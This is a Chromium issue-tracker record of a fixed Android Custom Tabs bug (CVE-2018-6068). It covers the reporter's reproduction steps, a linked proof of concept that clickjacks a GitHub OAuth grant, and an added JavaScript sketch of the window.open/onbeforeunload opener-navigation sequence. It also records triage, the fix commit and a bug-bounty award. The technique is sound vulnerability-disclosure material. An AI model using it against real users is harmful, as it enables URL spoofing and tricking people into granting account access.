
Issue 798933


Issue metadata

Status: Fixed
Owner:
Not on Chrome anymore
Closed: Feb 2018
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: Android
Pri: 1
Type: Bug-Security



Chrome for Android - Window.open combined with the onbeforeunload dialog crashes Chrome's WebView renderer

Reported by luan.her...@hotmail.com, Jan 4 2018

Issue description

VULNERABILITY DETAILS
Opening a new window while in Chrome's WebView and redirecting the opener's location to trigger an onbeforeunload dialog crashes the renderer while still allowing the user to interact with the page in the background.
This allows the attacker to spoof the URL and also to perform "clickjacking" on any website.

VERSION
I tested on:
Chrome 63.0.3239.111 / Android 6.0.1

REPRODUCTION CASE

WARNING:
By following through the PoC, you will end up giving permission to the app "OAuth.io" to read your private email on Github.

1. From Chrome's WebView, you should access https://lbherrera.github.io/lab/render/index.html
2. Click on the link.
3. A dialog will show up asking if you want to leave the page; click "Leave".
4. Click the button "Redeem prize". If no button shows up, try again from Step 1.

* I made this PoC only having my phone's screen resolution in mind, so the button's location may be off and you will need to click elsewhere to give permission to the "attacker" on GitHub, but a dedicated attacker could easily fix this, as he knows the users' screen resolution.
 
Attachment: poc.mp4 (5.4 MB)
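The opener/popup sequence the report describes (opener installs an onbeforeunload dialog, opens a popup, the popup navigates the opener), written out as an added example. This is not the reporter's PoC and not Chromium code; the file names index.html and popup.html are assumed, https://github.com/ stands in for the GitHub authorization page the PoC sent the opener to (the issue only says the loaded page is github.com), and the stub window objects at the bottom are a constructed model of browser behaviour so the two page scripts can be exercised under Node without a device.

```javascript
// Added example, not the reporter's PoC: the two-page opener/popup pattern from the
// report. Both page scripts take the window object as a parameter so they can run
// in a real page or against the constructed stub below.

// --- opener page (assumed name: index.html) ---------------------------------------
// Installs a beforeunload handler so any navigation away from this document first
// shows the browser's "Leave this page?" dialog, and wires up opening the popup.
function setupOpenerPage(win, popupUrl) {
  const state = { dialogArmed: false, popup: null };
  win.addEventListener('beforeunload', (event) => {
    // preventDefault() plus a non-undefined returnValue is what makes browsers
    // show the leave-page dialog instead of navigating silently.
    event.preventDefault();
    event.returnValue = '';
    state.dialogArmed = true;
  });
  state.openPopup = () => {
    // In a real page this must run from a user gesture (the link click in step 2
    // of the report) or the popup blocker returns null.
    state.popup = win.open(popupUrl, '_blank');
    return state.popup !== null;
  };
  return state;
}

// --- popup page (assumed name: popup.html) ----------------------------------------
// Navigates the opener. Assigning opener.location is permitted cross-origin and is
// the step that triggers the opener's beforeunload dialog.
function redirectOpener(win, targetUrl) {
  if (!win.opener) return false;
  win.opener.location = targetUrl;  // placeholder target, see lead-in
  return true;
}

// --- constructed stub of the browser objects (assumption, not browser code) ------
// Models only what the sequence needs: beforeunload fires before a navigation, and a
// prevented navigation waits for the user to answer the dialog.
function makeStubWindows() {
  const handlers = {};
  let href = 'https://attacker.example/index.html';  // constructed origin
  let pending = null;
  const opener = {
    addEventListener(type, fn) { (handlers[type] = handlers[type] || []).push(fn); },
    get location() { return href; },
    set location(url) {
      const event = {
        defaultPrevented: false,
        returnValue: undefined,
        preventDefault() { this.defaultPrevented = true; },
      };
      (handlers.beforeunload || []).forEach((fn) => fn(event));
      if (event.defaultPrevented) pending = url; else href = url;
    },
    open(url) { return { opener, location: url }; },
  };
  const dialogPending = () => pending !== null;
  const clickLeave = () => {
    if (pending === null) return false;
    href = pending;
    pending = null;
    return true;
  };
  return { opener, dialogPending, clickLeave };
}

// Drives the report's steps 2-3 against the stub and reports what happened.
function runScenario(targetUrl) {
  const stub = makeStubWindows();
  const page = setupOpenerPage(stub.opener, 'popup.html');
  page.openPopup();                           // step 2: click the link
  redirectOpener(page.popup, targetUrl);      // popup script navigates the opener
  const dialogShown = stub.dialogPending();   // step 3: "Leave this page?" dialog
  stub.clickLeave();                          // user taps "Leave"
  return { dialogShown, openerNavigatedTo: stub.opener.location };
}

if (typeof window === 'undefined') {
  console.log(JSON.stringify(runScenario('https://github.com/')));
}
```

The stub stops at the navigation itself: what the report is about is that, in a Custom Tab on the affected builds, the opener's old contents stayed visible after "Leave" while the new document received the taps, and that is browser compositor behaviour no page script can model.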
Status: Untriaged (was: Unconfirmed)
I need to look into this more.

I was able to reproduce the exploit using the Twitter app exactly as you did.

However, I wasn't able to reproduce this using the webview_shell, the crashed renderer was immediately replaced by the page you were trying to clickjack on Github.

I'm unsure if Twitter is doing something weird or the WebView shell is behaving differently than WebView in apps.
Components: Mobile>WebView
Labels: Security_Severity-Medium Security_Impact-Stable OS-Android
As I expected, I was able to reproduce this using another app using WebView.
I just tested and was able to reproduce it on Telegram and Facebook apps, so it doesn't seem to be something Twitter is doing specifically.
Owner: timvolod...@chromium.org
Status: Assigned (was: Untriaged)
timvolodine@ Could you please take a look at this?

Thank you

Comment 5 by sheriffbot@chromium.org, Jan 5 2018

Labels: M-64

Comment 6 by sheriffbot@chromium.org, Jan 5 2018

Labels: Pri-1

Comment 7 by sheriffbot@chromium.org, Jan 18 2018

timvolodine: Uh oh! This issue still open and hasn't been updated in the last 14 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers?

If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one?

If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started.

Thanks for your time! To disable nags, add the Disable-Nags label.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Owner: ----
Status: Available (was: Assigned)
currently no cycles to look at this.. unassigning to allow somebody else pick this up.

Comment 9 by mea...@chromium.org, Jan 26 2018

Cc: wjmaclean@chromium.org eugene...@chromium.org
eugenebut, wjmaclean: Would either of you be able to take a look at this medium severity bug? Thanks!
I'm afraid I have *zero* experience with Android WebView (which is quite a separate thing from desktop WebView, which I do work on).
Cc: -eugene...@chromium.org tedc...@chromium.org changwan@chromium.org
I don't work on Chrome for Android or Android WebView. From the bug description it's unclear if the problem is specific to Chrome or WebView. CCing folks from WebView and Chrome for Android to help with triage.
Owner: bauerb@chromium.org
Status: Assigned (was: Available)
The twitter page looks like a chrome custom tab, so maybe not WebView related at all.  Does this reproduce in the standalone Chrome app?
#12: I believe you are right. I was not aware of Chrome Custom Tabs and mistakenly took it for the WebView. Sorry about that :/

And no, it doesn't reproduce on the standalone app.

Comment 14 by sheriffbot@chromium.org, Feb 1 2018

bauerb: Uh oh! This issue still open and hasn't been updated in the last 28 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers?

If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one?

If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started.

Thanks for your time! To disable nags, add the Disable-Nags label.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Cc: yus...@chromium.org
Components: -Mobile>WebView UI>Browser>Mobile>CustomTabs
Thanks, nagbot! :-D

A few initial notes: 
* I can reproduce this in Stable and Canary. In a local debug build I get a blank page instead of the "Redeem prize" page, but otherwise the same behavior. I'll try a Release build to see if that makes a difference.
* I did not get any indication of an actual crash (either as a crash report or a stack trace on logcat). If there is a process going down, it's doing that very silently.
* The page that is being loaded definitely is https://github.com (as seen in the origin indicator), and it can even be interacted with (I get a keyboard popping up when I tap on the page, presumably because I'm hitting a text input field), but what is _visible_ is the old page.
* chrome://inspect/#devices actually shows two tabs (!) when that happens. By clicking "focus tab" I can switch the active tab.
* If the github authorization tab is active (i.e. not the spoof page), what is visible in the custom tab is ever so slightly blurry, which is what happens if the compositor draws a saved snapshot of the webcontents (which is stored at slightly reduced quality) instead of the "live" webcontents.
Status: Started (was: Assigned)
WIP CL is up at https://chromium-review.googlesource.com/c/chromium/src/+/904982.
Cc: mdjones@chromium.org
Components: UI>Browser>Mobile>CompositedUI

Comment 18 by bugdroid1@chromium.org, Feb 8 2018

The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/371ba40daa4b7c34912b02e0288e165ae2043a93

commit 371ba40daa4b7c34912b02e0288e165ae2043a93
Author: Bernhard Bauer <bauerb@chromium.org>
Date: Thu Feb 08 11:06:02 2018

🖿🔬 Move tab observation from LayoutManagerChrome to LayoutManager.

This ensures that all activities using a LayoutManager observe the necessary tab
events (not just ChromeTabbedActivity), and allows removing the
CustomTabLayoutManager, which used to observe only a subset of events.

Bug:  798933 
Change-Id: I20242ba89fc058256adeddfdc42260c0220a9fe8
Reviewed-on: https://chromium-review.googlesource.com/904982
Commit-Queue: Bernhard Bauer <bauerb@chromium.org>
Reviewed-by: Matthew Jones <mdjones@chromium.org>
Reviewed-by: Yusuf Ozuysal <yusufo@chromium.org>
Cr-Commit-Position: refs/heads/master@{#535351}
[modify] https://crrev.com/371ba40daa4b7c34912b02e0288e165ae2043a93/chrome/android/java/src/org/chromium/chrome/browser/compositor/layouts/LayoutManager.java
[modify] https://crrev.com/371ba40daa4b7c34912b02e0288e165ae2043a93/chrome/android/java/src/org/chromium/chrome/browser/compositor/layouts/LayoutManagerChrome.java
[modify] https://crrev.com/371ba40daa4b7c34912b02e0288e165ae2043a93/chrome/android/java/src/org/chromium/chrome/browser/compositor/layouts/LayoutManagerChromeTablet.java
[modify] https://crrev.com/371ba40daa4b7c34912b02e0288e165ae2043a93/chrome/android/java/src/org/chromium/chrome/browser/customtabs/CustomTabActivity.java
[delete] https://crrev.com/21a534ef80dc7ab11a42747f2601bdc48a740ba8/chrome/android/java/src/org/chromium/chrome/browser/customtabs/CustomTabLayoutManager.java
[modify] https://crrev.com/371ba40daa4b7c34912b02e0288e165ae2043a93/chrome/android/java/src/org/chromium/chrome/browser/webapps/WebappActivity.java
[modify] https://crrev.com/371ba40daa4b7c34912b02e0288e165ae2043a93/chrome/android/java_sources.gni

Status: Fixed (was: Started)
Cc: est...@chromium.org
+Emily because spoofing

Do I need to do anything special to make the sheriffbot pick this up?
No need to do anything special for sheriffbot, however, I think we may want to try to merge this to M65 per https://chromium.googlesource.com/chromium/src/+/master/docs/security/severity-guidelines.md#medium-severity.

Thanks for the fix!
Ah, great, thank you!

Comment 24 by sheriffbot@chromium.org, Feb 8 2018

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Labels: reward-topanel
Labels: -M-64 M-65
Labels: -reward-topanel reward-unpaid reward-2000
*** Boilerplate reminders! ***
Please do NOT publicly disclose details until a fix has been released to all our users. Early public disclosure may cancel the provisional reward. Also, please be considerate about disclosure when the bug affects a core library that may be used by other products. Please do NOT share this information with third parties who are not directly involved in fixing the bug. Doing so may cancel the provisional reward. Please be honest if you have already disclosed anything publicly or to third parties. Lastly, we understand that some of you are not interested in money. We offer the option to donate your reward to an eligible charity. If you prefer this option, let us know and we will also match your donation - subject to our discretion. Any rewards that are unclaimed after 12 months will be donated to a charity of our choosing.
*********************************
Nice one luan.herrera@! The Chrome VRP panel decided to award $2,000 for this report. Thanks!
Labels: -reward-unpaid reward-inprocess
Labels: Release-0-M65
Labels: CVE-2018-6068

Comment 32 by sheriffbot@chromium.org, Mar 16 2018

Labels: Merge-Request-66

Comment 33 by sheriffbot@chromium.org, Mar 16 2018

Labels: -Merge-Request-66 Merge-Review-66 Hotlist-Merge-Review
This bug requires manual review: M66 has already been promoted to the beta branch, so this requires manual review
Please contact the milestone owner if you have questions.
Owners: cmasso@(Android), cmasso@(iOS), josafat@(ChromeOS), abdulsyed@(Desktop)

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 34 by cmasso@google.com, Mar 19 2018

Please verify the fix in the latest canary

Comment 35 by cmasso@google.com, Mar 23 2018

Ping!
Cc: -wjmaclean@chromium.org

Comment 37 by cmasso@google.com, Mar 26 2018

awhalley@ please can you make sure this issue is merged into M66? Unless it can wait?

Comment 38 by cmasso@google.com, Mar 30 2018

Cc: awhalley@chromium.org
I have requested this issue to be merged into M66 since March 19th. We are now only a few days away from releasing M66. Can someone on this thread handle this since the owner does not respond?

awhalley@ do we care about merging this security issue?
Labels: -Merge-Review-66
No merge needed for 66
Labels: CVE_description-missing

Comment 41 by sheriffbot@chromium.org, May 17 2018

Labels: -Restrict-View-SecurityNotify allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: -CVE_description-missing CVE_description-submitted
